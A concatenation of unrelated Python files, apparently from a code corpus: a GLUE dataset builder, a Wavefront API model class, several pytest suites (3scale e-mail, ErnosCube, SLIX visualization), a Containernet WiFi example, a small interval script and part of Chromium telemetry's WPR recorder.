"sentence1": "sentence1",
"sentence2": "sentence2",
},
label_classes=["entailment", "not_entailment"],
label_column="label",
data_url="https://dl.fbaipublicfiles.com/glue/data/RTE.zip",
data_dir="RTE",
citation=textwrap.dedent("""\
@inproceedings{dagan2005pascal,
title={The PASCAL recognising textual entailment challenge},
author={Dagan, Ido and Glickman, Oren and Magnini, Bernardo},
booktitle={Machine Learning Challenges Workshop},
pages={177--190},
year={2005},
organization={Springer}
}
@inproceedings{bar2006second,
title={The second pascal recognising textual entailment challenge},
author={Bar-Haim, Roy and Dagan, Ido and Dolan, Bill and Ferro, Lisa and Giampiccolo, Danilo and Magnini, Bernardo and Szpektor, Idan},
booktitle={Proceedings of the second PASCAL challenges workshop on recognising textual entailment},
volume={6},
number={1},
pages={6--4},
year={2006},
organization={Venice}
}
@inproceedings{giampiccolo2007third,
title={The third pascal recognizing textual entailment challenge},
author={Giampiccolo, Danilo and Magnini, Bernardo and Dagan, Ido and Dolan, Bill},
booktitle={Proceedings of the ACL-PASCAL workshop on textual entailment and paraphrasing},
pages={1--9},
year={2007},
organization={Association for Computational Linguistics}
}
@inproceedings{bentivogli2009fifth,
title={The Fifth PASCAL Recognizing Textual Entailment Challenge.},
author={Bentivogli, Luisa and Clark, Peter and Dagan, Ido and Giampiccolo, Danilo},
booktitle={TAC},
year={2009}
}"""),
url="https://aclweb.org/aclwiki/Recognizing_Textual_Entailment"
),
GlueConfig(
name="wnli",
description=textwrap.dedent("""\
The Winograd Schema Challenge (Levesque et al., 2011) is a reading comprehension task
in which a system must read a sentence with a pronoun and select the referent of that pronoun from
a list of choices. The examples are manually constructed to foil simple statistical methods: Each
one is contingent on contextual information provided by a single word or phrase in the sentence.
To convert the problem into sentence pair classification, we construct sentence pairs by replacing
the ambiguous pronoun with each possible referent. The task is to predict if the sentence with the
pronoun substituted is entailed by the original sentence. We use a small evaluation set consisting of
new examples derived from fiction books that was shared privately by the authors of the original
corpus. While the included training set is balanced between two classes, the test set is imbalanced
between them (65% not entailment). Also, due to a data quirk, the development set is adversarial:
hypotheses are sometimes shared between training and development examples, so if a model memorizes the
training examples, they will predict the wrong label on corresponding development set
example. As with QNLI, each example is evaluated separately, so there is not a systematic correspondence
between a model's score on this task and its score on the unconverted original task. We
call converted dataset WNLI (Winograd NLI)."""),
text_features={
"sentence1": "sentence1",
"sentence2": "sentence2",
},
label_classes=["not_entailment", "entailment"],
label_column="label",
data_url="https://dl.fbaipublicfiles.com/glue/data/WNLI.zip",
data_dir="WNLI",
citation=textwrap.dedent("""\
@inproceedings{levesque2012winograd,
title={The winograd schema challenge},
author={Levesque, Hector and Davis, Ernest and Morgenstern, Leora},
booktitle={Thirteenth International Conference on the Principles of Knowledge Representation and Reasoning},
year={2012}
}"""),
url="https://cs.nyu.edu/faculty/davise/papers/WinogradSchemas/WS.html"
),
GlueConfig(
name="ax",
description=textwrap.dedent("""\
A manually-curated evaluation dataset for fine-grained analysis of
system performance on a broad range of linguistic phenomena. This
dataset evaluates sentence understanding through Natural Language
Inference (NLI) problems. Use a model trained on MulitNLI to produce
predictions for this dataset."""),
text_features={
"premise": "sentence1",
"hypothesis": "sentence2",
},
label_classes=["entailment", "neutral", "contradiction"],
label_column="", # No label since we only have test set.
# We must use a URL shortener since the URL from GLUE is very long and
# causes issues in TFDS.
data_url="https://bit.ly/2BOtOJ7",
data_dir="", # We are downloading a tsv.
citation="", # The GLUE citation is sufficient.
url="https://gluebenchmark.com/diagnostics"),
]
def _info(self):
features = {
text_feature: tfds.features.Text()
for text_feature in six.iterkeys(self.builder_config.text_features)
}
if self.builder_config.label_classes:
features["label"] = tfds.features.ClassLabel(
names=self.builder_config.label_classes)
else:
features["label"] = tf.float32
features["idx"] = tf.int32
return tfds.core.DatasetInfo(
builder=self,
description=_GLUE_DESCRIPTION,
features=tfds.features.FeaturesDict(features),
homepage=self.builder_config.url,
citation=self.builder_config.citation + "\n" + _GLUE_CITATION,
)
def _split_generators(self, dl_manager):
if self.builder_config.name == "ax":
data_file = dl_manager.download(self.builder_config.data_url)
return [
tfds.core.SplitGenerator(
name=tfds.Split.TEST,
gen_kwargs={
"data_file": data_file,
"split": "test",
})
]
if self.builder_config.name == "mrpc":
data_dir = None
mrpc_files = dl_manager.download({
"dev_ids": _MRPC_DEV_IDS,
"train": _MRPC_TRAIN,
"test": _MRPC_TEST,
})
else:
dl_dir = dl_manager.download_and_extract(self.builder_config.data_url)
data_dir = os.path.join(dl_dir, self.builder_config.data_dir)
mrpc_files = None
train_split = tfds.core.SplitGenerator(
name=tfds.Split.TRAIN,
gen_kwargs={
"data_file": os.path.join(data_dir or "", "train.tsv"),
"split": "train",
"mrpc_files": mrpc_files,
})
if self.builder_config.name == "mnli":
return [
train_split,
_mnli_split_generator(
"validation_matched", data_dir, "dev", matched=True),
_mnli_split_generator(
"validation_mismatched", data_dir, "dev", matched=False),
_mnli_split_generator("test_matched", data_dir, "test", matched=True),
_mnli_split_generator(
"test_mismatched", data_dir, "test", matched=False)
]
elif self.builder_config.name == "mnli_matched":
return [
_mnli_split_generator("validation", data_dir, "dev", matched=True),
_mnli_split_generator("test", data_dir, "test", matched=True)
]
elif self.builder_config.name == "mnli_mismatched":
return [
_mnli_split_generator("validation", data_dir, "dev", matched=False),
_mnli_split_generator("test", data_dir, "test", matched=False)
]
else:
return [
train_split,
tfds.core.SplitGenerator(
name=tfds.Split.VALIDATION,
gen_kwargs={
"data_file": os.path.join(data_dir or "", "dev.tsv"),
"split": "dev",
"mrpc_files": mrpc_files,
}),
tfds.core.SplitGenerator(
name=tfds.Split.TEST,
gen_kwargs={
"data_file": os.path.join(data_dir or "", "test.tsv"),
"split": "test",
"mrpc_files": mrpc_files,
}),
]
def _generate_examples(self, data_file, split, mrpc_files=None):
if self.builder_config.name == "mrpc":
# We have to prepare the MRPC dataset from the original sources ourselves.
examples = self._generate_example_mrpc_files(
mrpc_files=mrpc_files, split=split)
for example in examples:
yield example["idx"], example
else:
process_label = self.builder_config.process_label
label_classes = self.builder_config.label_classes
# The train and dev files for CoLA are the only tsv files without a
# header.
is_cola_non_test = self.builder_config.name == "cola" and split != "test"
with tf.io.gfile.GFile(data_file) as f:
reader = csv.DictReader(f, delimiter="\t", quoting=csv.QUOTE_NONE)
if is_cola_non_test:
reader = csv.reader(f, delimiter="\t", quoting=csv.QUOTE_NONE)
for n, row in enumerate(reader):
if is_cola_non_test:
row = {
"sentence": row[3],
"is_acceptable": row[1],
}
example = {
feat: row[col]
for feat, col in six.iteritems(self.builder_config.text_features)
}
example["idx"] = n
if self.builder_config.label_column in row:
label = row[self.builder_config.label_column]
# For some tasks, the label is represented as 0 and 1 in the tsv
# files and needs to be cast to integer to work with the feature.
if label_classes and label not in label_classes:
label = int(label) if label else None
example["label"] = process_label(label)
else:
example["label"] = process_label(-1)
# Filter out corrupted rows.
for value in six.itervalues(example):
if value is None:
break
else:
yield example["idx"], example
def _generate_example_mrpc_files(self, mrpc_files, split):
if split == "test":
with tf.io.gfile.GFile(mrpc_files["test"]) as f:
reader = csv.DictReader(f, delimiter="\t", quoting=csv.QUOTE_NONE)
for n, row in enumerate(reader):
yield {
"sentence1": row["#1 String"],
"sentence2": row["#2 String"],
"label": -1,
"idx": n,
}
else:
with tf.io.gfile.GFile(mrpc_files["dev_ids"]) as f:
reader = csv.reader(f, delimiter="\t", quoting=csv.QUOTE_NONE)
dev_ids = [[row[0], row[1]] for row in reader]
with tf.io.gfile.GFile(mrpc_files["train"]) as f:
# The first 3 bytes are the utf-8 BOM \xef\xbb\xbf, which messes with
# the Quality key.
f.seek(3)
reader = csv.DictReader(f, delimiter="\t", quoting=csv.QUOTE_NONE)
for n, row in enumerate(reader):
is_row_in_dev = [row["#1 ID"], row["#2 ID"]] in dev_ids
if is_row_in_dev == (split == "dev"):
yield {
"sentence1": row["#1 String"],
"sentence2": row["#2 String"],
"label": int(row["Quality"]),
"idx": n,
}
def _mnli_split_generator(name, data_dir, split, matched):
return tfds.core.SplitGenerator(
name=name,
gen_kwargs={
"data_file": os.path.join(
data_dir,
"%s_%s.tsv" % (split, "matched" if matched else "mismatched")),
"split": split,
"mrpc_files": None,
})
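# Consumption sketch (illustration only; downloads data on first run).
# "glue/cola" is one of the BuilderConfigs defined above.
if __name__ == "__main__":
    ds = tfds.load("glue/cola", split="train")
    for ex in ds.take(1):
        print(ex["sentence"].numpy(), int(ex["label"]))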
|
python
|
# coding: utf-8
"""
Wavefront REST API Documentation
<p>The Wavefront REST API enables you to interact with Wavefront servers using standard REST API tools. You can use the REST API to automate commonly executed operations such as automatically tagging sources.</p><p>When you make REST API calls outside the Wavefront REST API documentation you must add the header \"Authorization: Bearer <<API-TOKEN>>\" to your HTTP requests.</p> # noqa: E501
OpenAPI spec version: v2
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from wavefront_api_client.configuration import Configuration
class SpecificData(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'class_loader': 'ClassLoader',
'conversions': 'list[ConversionObject]',
'fast_reader_builder': 'FastReaderBuilder',
'fast_reader_enabled': 'bool'
}
attribute_map = {
'class_loader': 'classLoader',
'conversions': 'conversions',
'fast_reader_builder': 'fastReaderBuilder',
'fast_reader_enabled': 'fastReaderEnabled'
}
def __init__(self, class_loader=None, conversions=None, fast_reader_builder=None, fast_reader_enabled=None, _configuration=None): # noqa: E501
"""SpecificData - a model defined in Swagger""" # noqa: E501
if _configuration is None:
_configuration = Configuration()
self._configuration = _configuration
self._class_loader = None
self._conversions = None
self._fast_reader_builder = None
self._fast_reader_enabled = None
self.discriminator = None
if class_loader is not None:
self.class_loader = class_loader
if conversions is not None:
self.conversions = conversions
if fast_reader_builder is not None:
self.fast_reader_builder = fast_reader_builder
if fast_reader_enabled is not None:
self.fast_reader_enabled = fast_reader_enabled
@property
def class_loader(self):
"""Gets the class_loader of this SpecificData. # noqa: E501
:return: The class_loader of this SpecificData. # noqa: E501
:rtype: ClassLoader
"""
return self._class_loader
@class_loader.setter
def class_loader(self, class_loader):
"""Sets the class_loader of this SpecificData.
:param class_loader: The class_loader of this SpecificData. # noqa: E501
:type: ClassLoader
"""
self._class_loader = class_loader
@property
def conversions(self):
"""Gets the conversions of this SpecificData. # noqa: E501
:return: The conversions of this SpecificData. # noqa: E501
:rtype: list[ConversionObject]
"""
return self._conversions
@conversions.setter
def conversions(self, conversions):
"""Sets the conversions of this SpecificData.
:param conversions: The conversions of this SpecificData. # noqa: E501
:type: list[ConversionObject]
"""
self._conversions = conversions
@property
def fast_reader_builder(self):
"""Gets the fast_reader_builder of this SpecificData. # noqa: E501
:return: The fast_reader_builder of this SpecificData. # noqa: E501
:rtype: FastReaderBuilder
"""
return self._fast_reader_builder
@fast_reader_builder.setter
def fast_reader_builder(self, fast_reader_builder):
"""Sets the fast_reader_builder of this SpecificData.
:param fast_reader_builder: The fast_reader_builder of this SpecificData. # noqa: E501
:type: FastReaderBuilder
"""
self._fast_reader_builder = fast_reader_builder
@property
def fast_reader_enabled(self):
"""Gets the fast_reader_enabled of this SpecificData. # noqa: E501
:return: The fast_reader_enabled of this SpecificData. # noqa: E501
:rtype: bool
"""
return self._fast_reader_enabled
@fast_reader_enabled.setter
def fast_reader_enabled(self, fast_reader_enabled):
"""Sets the fast_reader_enabled of this SpecificData.
:param fast_reader_enabled: The fast_reader_enabled of this SpecificData. # noqa: E501
:type: bool
"""
self._fast_reader_enabled = fast_reader_enabled
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(SpecificData, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, SpecificData):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, SpecificData):
return True
return self.to_dict() != other.to_dict()
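# Minimal round-trip sketch (illustration only; the values are made up):
if __name__ == '__main__':
    data = SpecificData(fast_reader_enabled=True)
    print(data.to_dict())  # {'class_loader': None, ..., 'fast_reader_enabled': True}
    print(data == SpecificData(fast_reader_enabled=True))  # True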
|
python
|
"""
Rewrite spec/functional_specs/email_accounts_spec.rb
Creates account and checks, if the emails informing about the
new service subscription, new application sign-up to service and application
subscription to an app plan have been sent.
"""
import os
import re
import pytest
import yaml
import backoff
from testsuite import rawobj
from testsuite.utils import blame
# Asynchronous 3scale e-mail notifications can be significantly delayed when
# there are many requests, therefore this test is not run in parallel.
pytestmark = [pytest.mark.disruptive]
@pytest.fixture(scope="module")
def application(service, custom_application, custom_app_plan, lifecycle_hooks, request):
    "application bound to the account and service, with a description that doesn't break yaml parsing"
plan = custom_app_plan(rawobj.ApplicationPlan(blame(request, "aplan")), service)
app = custom_application(
rawobj.Application(blame(request, "app"), plan, "Api signup"), hooks=lifecycle_hooks,
annotate=False)
service.proxy.deploy()
return app
@pytest.fixture(scope="module")
def mail_template(account, application, testconfig) -> dict:
"""loads the mail templates and substitutes the variables"""
dirname = os.path.dirname(__file__)
with open(f"{dirname}/mail_templates.yml", encoding="utf8") as stream:
yaml_string = stream.read()
yaml_string = yaml_string.replace("<test_account>", account.entity_name) \
.replace("<test_group>", account.entity['org_name']) \
.replace("<threescale_superdomain>", testconfig["threescale"]["superdomain"]) \
.replace("<account_email_domain>", "anything.invalid") \
.replace("<username>", "admin") \
.replace("<tenant>", "3scale") \
.replace("<service>", application['service_name']) \
.replace("<aplan>", application['plan_name']) \
.replace("<application>", application['name']) \
.replace("<app_description>", application['description']) \
        .replace("\\\\[", "\\[") \
        .replace("\\\\]", "\\]")  # reduces '\\[' and '\\]' in the template to '\[' and '\]'
return yaml.safe_load(yaml_string)
def headers(msg, filter_keys=None):
"""Mailhog message headers with optional filtering"""
return {
k: ", ".join(v)
for k, v in msg["Content"]["Headers"].items()
if (not filter_keys or k in filter_keys)
}
def body(msg):
"""Mailhog message body"""
return msg["Content"]["Body"].replace("=\r\n", "").replace("\r\n", "")
def message_match(tpl, key, text):
"""True if text matches tpl for the key"""
for i in tpl["subject_templates"].values():
if re.fullmatch(i[key], text):
return True
return False
# requires mailhog *AND* special deployment with preconfigured smtp secret
# pylint: disable=unused-argument
@backoff.on_exception(backoff.fibo, AssertionError, max_tries=10, jitter=None)
@pytest.mark.sandbag
def test_emails_after_account_creation(mailhog_client, mail_template):
"""
Checks that the total number of matching emails is three.
"""
    tpl = mail_template  # save a few letters
messages = mailhog_client.messages()["items"]
assert messages, "Mailhog inbox is empty"
messages = [m for m in messages if message_match(tpl, "Headers", headers(m)["X-SMTPAPI"])]
assert messages, f"Didn't find assumed X-SMTPAPI: {tpl['Headers']}"
messages = [m for m in messages if headers(m, filter_keys=tpl["equal_templates"].keys()) == tpl["equal_templates"]]
assert messages, f"Didn't find any email sent to expected account identified by {tpl['equal_templates']}"
messages = [m for m in messages if message_match(tpl, "Body", body(m))]
assert len(messages) == 3
    # Yeah! Cleanup in the test. This shouldn't be here because it won't clean
    # up in case of failure. A reason to have it here is that this version of
    # the test doesn't contain a separate function to filter the tested
    # messages (probably the author was lazy); a separate function-scoped
    # fixture can also be dangerous due to backoff/flakiness. On the other
    # hand it isn't that "devastating" if messages are not cleaned up, as the
    # mailhog instance receives too many other emails and is flooded anyway.
    # A better implementation with cleanup in a fixture is highly desirable.
mailhog_client.delete([m["ID"] for m in messages])
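# Illustration of the headers()/body() helpers above on a fabricated
# Mailhog-style message (the structure is an assumption matching what the
# test consumes):
#   _msg = {"Content": {"Headers": {"Subject": ["hi"]}, "Body": "a=\r\nb\r\n"}}
#   headers(_msg)  -> {"Subject": "hi"}
#   body(_msg)     -> "ab"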
|
python
|
# Read two (step, count) pairs and print the intersection of the intervals
# [(x-1)*a + x, (x+1)*a + x] and [(y-1)*b + y, (y+1)*b + y], or -1 if they are disjoint.
a, b, x, y = (int(input()) for _ in range(4))
p, q = (x - 1) * a + x, (x + 1) * a + x
e, r = (y - 1) * b + y, (y + 1) * b + y
print(-1 if q < e or r < p else str(max(p, e)) + ' ' + str(min(q, r)))
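# Worked example (assumed inputs 2, 3, 3, 2 on four lines):
#   a=2, x=3 -> p, q = 2*2+3, 4*2+3 = 7, 11
#   b=3, y=2 -> e, r = 1*3+2, 3*3+2 = 5, 11
#   intervals [7, 11] and [5, 11] overlap -> prints "7 11"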
|
python
|
#!/usr/bin/python
"""
This is the most simple example to showcase Containernet.
"""
from containernet.net import Containernet
from containernet.node import DockerSta
from containernet.cli import CLI
from containernet.term import makeTerm
from mininet.log import info, setLogLevel
from mn_wifi.link import wmediumd
from mn_wifi.wmediumdConnector import interference
import sys
import os
def topology():
net = Containernet(link=wmediumd, wmediumd_mode=interference, noise_th=-91, fading_cof=3)
info('*** Adding docker containers\n')
sta1 = net.addStation('sta1', ip='10.0.0.3', mac='00:02:00:00:00:10',
cls=DockerSta, dimage="cornet:focalfoxyNWH", cpu_shares=20)
sta2 = net.addStation('sta2', ip='10.0.0.4', mac='00:02:00:00:00:11',
cls=DockerSta, dimage="cornet:focalfoxyNWH", cpu_shares=20)
ap1 = net.addAccessPoint('ap1')
c0 = net.addController('c0')
#d1 = net.addDocker('d1', ip='10.0.0.5', dimage="cornet:focalfoxyNWH")
#info('*** Adding switch\n')
#s1 = net.addSwitch('s1')
info("*** adding links")
#net.addLink(ap1,s1)
#net.addLink(d1,ap1)
info('*** Configuring WiFi nodes\n')
net.configureWifiNodes()
    if '-p' not in sys.argv:
net.plotGraph(max_x=500, max_y=500)
info('*** Starting network\n')
net.build()
#s1.start([c0])
ap1.start([c0])
#makeTerm(sta1, cmd="bash -c 'apt-get update && apt-get install iw;'")
#makeTerm(sta2, cmd="bash -c 'apt-get update && apt-get install iw;'")
#sta1.cmd('iw dev sta1-wlan0 connect new-ssid')
#sta2.cmd('iw dev sta2-wlan0 connect new-ssid')
info('*** Running CLI\n')
CLI(net)
info('*** Stopping network\n')
net.stop()
if __name__ == '__main__':
os.system('sudo service network-manager stop')
setLogLevel('debug')
topology()
|
python
|
from ErnosCube.mutation_node import MutationNode
from ErnosCube.cube_mutation import CubeMutation
from pytest import mark
class TestMutationNode:
"""Collection of all tests run on instances of the MutationNode."""
@mark.dependency(name="construction_1")
def test_construction_1(self):
MutationNode(None, None, None)
@mark.dependency(name="make_mut_seq_1", depends=["construction_1"])
def test_make_mut_seq_1(self):
root = MutationNode(None, None, None)
mut_seq = root.make_mut_seq(CubeMutation.e)
assert len(mut_seq) == 1
assert mut_seq[0] == CubeMutation.e
@mark.dependency(
name="construction_2", depends=["construction_1", "make_mut_seq_1"]
)
def test_construction_2(self):
root = MutationNode(None, None, None)
mutation = CubeMutation.e
mut_seq = root.make_mut_seq(mutation)
child = MutationNode(root, mutation, mut_seq)
assert root.parent is None
assert root.mutation is None
assert len(root.children) == 1
assert root.children[0] == child
assert len(root.mut_seq) == 0
assert child.parent is root
assert child.mutation == mutation
assert len(child.children) == 0
assert len(child.mut_seq) == 1
assert child.mut_seq[0] == mutation
@mark.dependency(name="make_mut_seq_2", depends=["construction_2"])
def test_make_mut_seq_2(self):
root = MutationNode(None, None, None)
mutation = CubeMutation.e
mut_seq = root.make_mut_seq(mutation)
child = MutationNode(root, mutation, mut_seq)
mut_seq_2 = child.make_mut_seq(mutation)
assert len(mut_seq_2) == 2
assert mut_seq_2[0] == mutation
assert mut_seq_2[1] == mutation
|
python
|
import numpy
from SLIX import toolbox, io, visualization
import matplotlib
from matplotlib import pyplot as plt
import pytest
import shutil
import os
matplotlib.use('agg')
class TestVisualization:
def test_visualize_unit_vectors(self):
example = io.imread('tests/files/demo.nii')
peaks = toolbox.significant_peaks(example, use_gpu=False)
centroid = toolbox.centroid_correction(example, peaks, use_gpu=False)
direction = toolbox.direction(peaks, centroid, use_gpu=False)
unit_x, unit_y = toolbox.unit_vectors(direction, use_gpu=False)
visualization.unit_vectors(unit_x, unit_y, thinout=10)
plt.savefig('tests/output/vis/unit_vectors.tiff', dpi=100,
bbox_inches='tight')
orig = io.imread('tests/files/vis/unit_vectors.tiff')
to_compare = io.imread('tests/output/vis/unit_vectors.tiff')
if numpy.all(numpy.isclose(orig - to_compare, 0)):
assert True
else:
io.imwrite('tests/output/vis/unit_vectors-diff.tiff', orig - to_compare)
assert False
def test_visualize_unit_vector_distribution(self):
example = io.imread('tests/files/demo.nii')
peaks = toolbox.significant_peaks(example, use_gpu=False)
centroid = toolbox.centroid_correction(example, peaks, use_gpu=False)
direction = toolbox.direction(peaks, centroid, use_gpu=False)
unit_x, unit_y = toolbox.unit_vectors(direction, use_gpu=False)
visualization.unit_vector_distribution(unit_x, unit_y, thinout=15, vector_width=5, alpha=0.01)
plt.savefig('tests/output/vis/unit_vector_distribution.tiff', dpi=100,
bbox_inches='tight')
orig = io.imread('tests/files/vis/unit_vector_distribution.tiff')
to_compare = io.imread('tests/output/vis/unit_vector_distribution.tiff')
if numpy.all(numpy.isclose(orig - to_compare, 0)):
assert True
else:
io.imwrite('tests/output/vis/unit_vector_distribution-diff.tiff', orig - to_compare)
assert False
def test_visualize_parameter_map(self):
example = io.imread('tests/files/demo.nii')
prominence = toolbox.mean_peak_prominence(example, kind_of_normalization=1, use_gpu=False)
visualization.parameter_map(prominence, colorbar=False)
plt.savefig('tests/output/vis/parameter_map.tiff', dpi=100,
bbox_inches='tight')
orig = io.imread('tests/files/vis/parameter_map.tiff')
to_compare = io.imread('tests/output/vis/parameter_map.tiff')
assert numpy.all(numpy.isclose(orig - to_compare, 0))
def test_visualize_direction_one_dir(self):
image = numpy.arange(0, 180)
hsv_image = visualization.direction(image)
assert numpy.all(hsv_image[0, :] == [1, 0, 0])
assert numpy.all(hsv_image[30, :] == [1, 1, 0])
assert numpy.all(hsv_image[60, :] == [0, 1, 0])
assert numpy.all(hsv_image[90, :] == [0, 1, 1])
assert numpy.all(hsv_image[120, :] == [0, 0, 1])
assert numpy.all(hsv_image[150, :] == [1, 0, 1])
def test_visualize_direction_multiple_dir(self):
first_dir = numpy.arange(0, 180)[..., numpy.newaxis, numpy.newaxis]
second_dir = (first_dir + 30) % 180
second_dir[0:45] = -1
third_dir = (first_dir + 60) % 180
third_dir[0:90] = -1
fourth_dir = (first_dir + 90) % 180
fourth_dir[0:135] = -1
stack_direction = numpy.concatenate((first_dir,
second_dir,
third_dir,
fourth_dir),
axis=-1)
hsv_image = visualization.direction(stack_direction)
print(hsv_image)
# Check first direction
assert numpy.all(hsv_image[0, 0, :] == [1, 0, 0])
assert numpy.all(hsv_image[1, 1, :] == [1, 0, 0])
assert numpy.all(hsv_image[0, 1, :] == [1, 0, 0])
assert numpy.all(hsv_image[1, 0, :] == [1, 0, 0])
assert numpy.all(hsv_image[60, 0, :] == [1, 1, 0])
assert numpy.all(hsv_image[61, 1, :] == [1, 1, 0])
assert numpy.all(hsv_image[60, 1, :] == [1, 1, 0])
assert numpy.all(hsv_image[61, 0, :] == [1, 1, 0])
# Probe check second direction
assert numpy.all(hsv_image[120, 0, :] == [0, 1, 0])
assert numpy.all(hsv_image[121, 1, :] == [0, 1, 0])
assert numpy.all(hsv_image[120, 1, :] == [0, 1, 1])
assert numpy.all(hsv_image[121, 0, :] == [0, 1, 1])
# Probe check third direction
assert numpy.all(hsv_image[240, 0, :] == [0, 0, 1])
assert numpy.all(hsv_image[240, 1, :] == [1, 0, 0])
assert numpy.all(hsv_image[241, 0, :] == [1, 0, 1])
assert numpy.all(hsv_image[241, 1, :] == [0, 0, 0])
# Probe check fourth direction
assert numpy.all(hsv_image[300, 0, :] == [1, 0, 1])
assert numpy.all(hsv_image[300, 1, :] == [1, 1, 0])
assert numpy.all(hsv_image[301, 0, :] == [1, 0, 0])
assert numpy.all(hsv_image[301, 1, :] == [0, 1, 0])
@pytest.fixture(scope="session", autouse=True)
def run_around_tests(request):
if not os.path.isdir('tests/output/vis'):
os.makedirs('tests/output/vis')
# A test function will be run at this point
yield
def remove_test_dir():
if os.path.isdir('tests/output/vis'):
# shutil.rmtree('tests/output/vis')
pass
request.addfinalizer(remove_test_dir)
@pytest.fixture(scope="function", autouse=True)
def run_around_single_test(request):
plt.clf()
plt.cla()
plt.close()
plt.axis('off')
# A test function will be run at this point
yield
|
python
|
# Copyright 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import absolute_import
import argparse
import logging
import shutil
import sys
import tempfile
import six
from telemetry import benchmark
from telemetry import story
from telemetry.internal.browser import browser_options
from telemetry.internal.results import results_options
from telemetry.internal import story_runner
from telemetry.internal.util import binary_manager
from telemetry.page import legacy_page_test
from telemetry.util import matching
from telemetry.util import wpr_modes
from py_utils import discover
import py_utils
DEFAULT_LOG_FORMAT = (
'(%(levelname)s) %(asctime)s %(module)s.%(funcName)s:%(lineno)d '
'%(message)s')
class RecorderPageTest(legacy_page_test.LegacyPageTest):
def __init__(self, page_test):
super(RecorderPageTest, self).__init__()
self._page_test = page_test
self._platform = None
@property
def platform(self):
return self._platform
def CustomizeBrowserOptions(self, options):
if self._page_test:
self._page_test.CustomizeBrowserOptions(options)
def WillStartBrowser(self, browser):
if self.platform is not None:
assert browser.GetOSName() == self.platform
self._platform = browser.GetOSName() # Record platform name from browser.
if self._page_test:
self._page_test.WillStartBrowser(browser)
def DidStartBrowser(self, browser):
if self._page_test:
self._page_test.DidStartBrowser(browser)
def WillNavigateToPage(self, page, tab):
"""Override to ensure all resources are fetched from network."""
tab.ClearCache(force=False)
if self._page_test:
self._page_test.WillNavigateToPage(page, tab)
def DidNavigateToPage(self, page, tab):
if self._page_test:
self._page_test.DidNavigateToPage(page, tab)
tab.WaitForDocumentReadyStateToBeComplete()
py_utils.WaitFor(tab.HasReachedQuiescence, 30)
def CleanUpAfterPage(self, page, tab):
if self._page_test:
self._page_test.CleanUpAfterPage(page, tab)
def ValidateAndMeasurePage(self, page, tab, results):
if self._page_test:
self._page_test.ValidateAndMeasurePage(page, tab, results)
def _GetSubclasses(base_dir, cls):
"""Returns all subclasses of |cls| in |base_dir|.
Args:
cls: a class
Returns:
dict of {underscored_class_name: benchmark class}
"""
return discover.DiscoverClasses(base_dir, base_dir, cls,
index_by_class_name=True)
def _MaybeGetInstanceOfClass(target, base_dir, cls):
if isinstance(target, cls):
return target
classes = _GetSubclasses(base_dir, cls)
return classes[target]() if target in classes else None
def _PrintAllImpl(all_items, item_name, output_stream):
output_stream.write('Available %s\' names with descriptions:\n' % item_name)
keys = sorted(all_items.keys())
key_description = [(k, all_items[k].Description()) for k in keys]
_PrintPairs(key_description, output_stream)
output_stream.write('\n')
def _PrintAllBenchmarks(base_dir, output_stream):
# TODO: reuse the logic of finding supported benchmarks in benchmark_runner.py
# so this only prints out benchmarks that are supported by the recording
# platform.
_PrintAllImpl(_GetSubclasses(base_dir, benchmark.Benchmark), 'benchmarks',
output_stream)
def _PrintAllStories(base_dir, output_stream):
# TODO: actually print all stories once record_wpr support general
# stories recording.
_PrintAllImpl(_GetSubclasses(base_dir, story.StorySet), 'story sets',
output_stream)
def _PrintPairs(pairs, output_stream, prefix=''):
"""Prints a list of string pairs with alignment."""
first_column_length = max(len(a) for a, _ in pairs)
format_string = '%s%%-%ds %%s\n' % (prefix, first_column_length)
for a, b in pairs:
output_stream.write(format_string % (a, b.strip()))
class WprRecorder(object):
def __init__(self, base_dir, target, args=None):
self._base_dir = base_dir
self._output_dir = tempfile.mkdtemp()
try:
self._options = self._CreateOptions()
self._benchmark = _MaybeGetInstanceOfClass(target, base_dir,
benchmark.Benchmark)
self._parser = self._options.CreateParser(usage='See %prog --help')
self._AddCommandLineArgs()
self._ParseArgs(args)
self._ProcessCommandLineArgs()
page_test = None
if self._benchmark is not None:
test = self._benchmark.CreatePageTest(self.options)
# Object only needed for legacy pages; newer benchmarks don't need this.
if isinstance(test, legacy_page_test.LegacyPageTest):
page_test = test
self._record_page_test = RecorderPageTest(page_test)
self._page_set_base_dir = (
self._options.page_set_base_dir if self._options.page_set_base_dir
else self._base_dir)
self._story_set = self._GetStorySet(target)
except:
self._CleanUp()
raise
def __enter__(self):
return self
def __exit__(self, *args):
self._CleanUp()
@property
def options(self):
return self._options
def _CreateOptions(self):
options = browser_options.BrowserFinderOptions()
options.browser_options.wpr_mode = wpr_modes.WPR_RECORD
options.intermediate_dir = self._output_dir
return options
def _CleanUp(self):
shutil.rmtree(self._output_dir)
def CreateResults(self):
if self._benchmark is not None:
benchmark_name = self._benchmark.Name()
benchmark_description = self._benchmark.Description()
else:
benchmark_name = 'record_wpr'
benchmark_description = None
return results_options.CreateResults(
self._options,
benchmark_name=benchmark_name,
benchmark_description=benchmark_description,
report_progress=True)
def _AddCommandLineArgs(self):
self._parser.add_option('--page-set-base-dir', action='store',
type='string')
story_runner.AddCommandLineArgs(self._parser)
if self._benchmark is not None:
self._benchmark.AddCommandLineArgs(self._parser)
self._benchmark.SetArgumentDefaults(self._parser)
self._parser.add_option('--upload', action='store_true')
self._parser.add_option('--use-local-wpr', action='store_true',
help='Builds and runs WPR from Catapult. '
